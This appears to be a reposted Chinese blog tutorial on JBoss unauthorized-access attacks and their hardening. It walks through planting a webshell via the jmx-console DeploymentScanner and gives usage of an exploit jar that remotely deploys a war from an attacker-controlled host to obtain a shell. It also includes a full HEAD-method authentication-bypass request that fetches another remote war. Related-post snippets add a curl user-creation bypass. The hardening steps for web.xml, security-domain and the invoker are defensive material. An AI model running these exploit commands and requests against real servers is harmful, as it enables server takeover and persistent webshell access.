WEB中间件--Jboss未授权访问,加固,绕过

最新推荐文章于 2024-05-12 08:00:00 发布
最新推荐文章于 2024-05-12 08:00:00 发布
阅读量641 收藏
点赞数
文章标签: java web.xml shell
原文链接:http://www.cnblogs.com/hackxf/p/8951699.html
版权

1,Jboss未授权访问部署木马

发现存在Jboss默认页面,点进控制页
1275435-20180426113101207-2068755760.png
点击 Jboss.deployment 进入应用部署页面
也可以直接输入此URL进入

http://www.ctfswiki.com:8080//jmxconsole/HtmlAdaptoraction=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL

1275435-20180426113126794-1099491743.png
搭建远程木马服务器,可以用apache等web服务器来搭建,通过addurl参数进行木马的远程部署
1275435-20180426113248204-1887504564.png
部署成功,访问木马地址
1275435-20180426113337682-133971732.png
最后附上一个jboss未授权访问EXP,备用,使用说明

1. 查看系统名称

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

2. 查看系统版本

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion


3.远程部署war

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war

获得shell地址:
www.any.com:8080/no/index.jsp

1275435-20180426114535498-1134313548.png

2.jboss加固

(1)目录

C:\Program Files\Java\jboss-4.2.3.GA\server\default\deploy\jmx-console.war\WEB-INF
下的 jboss-web.xml
把 security-domain 注释去掉。
1275435-20180426182248019-1571137611.png
web.xml
把 GET 和 POST 两行注释掉,同时 security-constraint 整个部分不要注释掉,不然存在head头绕过

<security-constraint>   
      <web-resource-collection>   
             <web-resource-name>HtmlAdaptor</web-resource-name>  
             <description>An example security config that only allows users                             with the role JBossAdmin to access the HTML JMX console web         application </description>               
              <url-pattern>/*</url-pattern>   
              <!-<http-method>GET</http-method>   
                   <http-method>POST</http-method> -->  
             </web-resource-collection>   
             <auth-constraint>   
                   <role-name>JBossAdmin</role-name>   
             </auth-constraint>   
</security-constraint>

1275435-20180426183107445-636697233.png

(2)目录

C:\Program Files\Java\jboss-4.2.3.GA\server\default\conf\props\jbossws-users.properties
加上登录用户名密码

1275435-20180426183714171-674693678.png

3.jboss head绕过上传

数据包

HEAD YWRtaW46YWRtaW4=/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment:type=DeploymentScanner,flavor=URL&methodIndex=7&arg0=http://192.168.91.139/h.war  HTTP/1.1
Host: 192.168.91.108:8080
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://192.168.91.108:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Referer: http://192.168.91.108:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 4

jboss invoke接口修复

C:\Program Files\Java\jboss-4.2.3.GA\server\default\deploy\http-invoker.sar\invoker.war\WEB-INF

server/$CONFIG/deploy/http-invoker.sar/http-invoker.war/WEB-INF/w
eb.xml 文件,将标签中的
url-pattern 修改为/*,并注释掉其中的两个 http-method。

转载于:https://www.cnblogs.com/hackxf/p/8951699.html

diecai2192
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jbaoo4.2.3-jmx-console授权访问.docx
04-10
jbaoo4.2.3-jmx-console授权访问
intellij-idea-plugin:JBoss Forge IntelliJ IDEA插件
05-23
JBoss Forge IntelliJ IDEA插件发表在 提供对IntelliJ IDEA中的命令和向导的支持。 要显示命令列表,请按Ctrl+Alt+4 。 在MacOSX上,使用Command + Option + 4 。安装使用IDE内置插件系统: 首选项>插件>市场>搜索...
JBOSS授权访问
qq_41788704的博客
10-09 2114
JBOSS主页 # URL后添加 jmx-console/进入控制台,然后进入deployment # jar cvf back.war shell.jsp 将木马打成war包,然后放在公网服务器上,在箭头指向的地方填入war包地址
授权访问JBoss授权访问漏洞
最新发布
qq_68163788的博客
05-12 424
JBoss授权访问漏洞是指攻击者可以通过构造特定的请求包,在授权的情况下远程执行命令,进而控制服务器。该漏洞主要影响JBoss管理界面,由于默认配置下,JBoss管理界面存在弱口令和默认账户等问题,因此容易被攻击者利用。 攻击者通过向JBoss管理界面发送恶意请求,可以实现对服务器的远程命令执行、文件上传等操作。此外,由于JBoss管理界面存在多个版本,不同版本的漏洞细节也存在差异,因此需要根据具体情况进行修复。
jboss 认证绕过漏洞利用的另外一种方式添加用户
cnbird's blog
02-05 3708
curl -I "http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser
Jboss授权访问
qq_44880255的博客
08-11 1401
1、jmx-console授权访问 漏洞原因 JBoss默认访问jmx-console页面不需要输入密码,可以进入配置war包进行危险操作。或默认用户名密码为admin/admin。 漏洞复现 这里使用的环境是kali中的vulhub和docker。 进入vulhub/jboss/CVE-2017-12149目录,执行命令docker-compose up -d开启环境。 访问http://your-ip:8080/。(这里我的IP是172.17.0.1) 构造payload部署war包。 http
jboss 远程连接以及授权远程上传和访问war包
qfslyy的博客
12-21 471
1:如果jboss启动不了,在环境变量里配一个jboss的系统 变量。 2:热部署文档位置: 一般默认是无法外部访问的,会造成连接失败: 可以修改下面的配置文件进行访问: 修改为任意ip: 这样之后可以在别的机器访问了 在别的机器上开启phpstudy,登录jboos,远程访问: 在这里上传war包,wai包在哪里就写那个ip,不是要上传过去的那个ip,http;// 上传成功: 就远程可以访问war包了: ...
jboss-web-3.0.0-beta-2.zip_beta_jboss_jboss web 3.0_jboss-web
09-22
JBoss Web应用服务器,构建于Tomcat之上
spring-boot-web-JBoss5
06-09
JBoss5 + Java6 + SpringBoot 尝试在 Java6 + JBoss5 上部署 Spring Boot 战争的尝试和错误的残骸。这是不完整的。 忘记删除 spring-boot-starter-tomcat。 java.lang.UnsupportedClassVersionError: org/apache...
atmosphere-compat-jbossweb-0.6.3.jar.zip
07-17
标签:atmosphere-compat-jbossweb-0.6.3.jar.zip,atmosphere,compat,jbossweb,0.6.3,jar.zip包下载,依赖包
java8看不到源码-jboss-parent-pom:JBoss父POM
06-04
>jboss-parent</ artifactId > < version >33</ version > </ parent > pom 包含允许自定义各种构建配置的属性。 例如,要覆盖 maven-compiler-plugin 的默认版本,只需设置一个属性。 < properties ...
JBoss_管理控制台指南中文版
12-09
JBoss_管理控制台指南中文版
jboos jar包
03-31
是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用,而不用支付费用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。
jboss-system.jar
11-27
jboss-system.jar jboss-system.jar
Eclipse工程Http Invoker Service & Client
11-23
Eclipse工程Http Invoker Service & Client
JBOSS 授权访问漏洞复现学习
0nc3的博客
12-18 1414
0x00 漏洞简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。 默认情况下访问 http://ip:8080/jmx-console 就可以访问管理控制台,不需要输入用户名和密码就可以直接浏览 JBoss 的部署管理的信息,部署上传木马,存在...
Jboss历史漏洞利用 - JMX Console 授权访问漏洞
HAKUNAMATATATTA的博客
12-08 2178
JbosswebUI界面 http://ip:port/jmx-console 授权访问(或默认密码 admin/admin ),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取 webshell
JBoss漏洞
周星星的博客
10-24 984
JBoss漏洞的简单学习记录
JBOSS授权漏洞总结
m0_64481831的博客
04-03 967
JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。JBOSS授权访问漏洞介绍漏洞原理JBOSS授权漏洞在默认情况下无需账号密码就可以直接访问后台管理控制台页面(),导致攻击者可以获取网站信息、上传webshell,获取服务器权限等。
web.xml ejb-jar.xml jboss-web.xml 关系
05-30
web.xml、ejb-jar.xml和jboss-web.xml是三个不同的配置文件,用于在Java Web应用中配置Web组件、EJB组件和JBoss Web容器。 web.xml文件用于配置Web组件,包括Servlet、Filter、Listener等。它通常位于Web应用的WEB-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值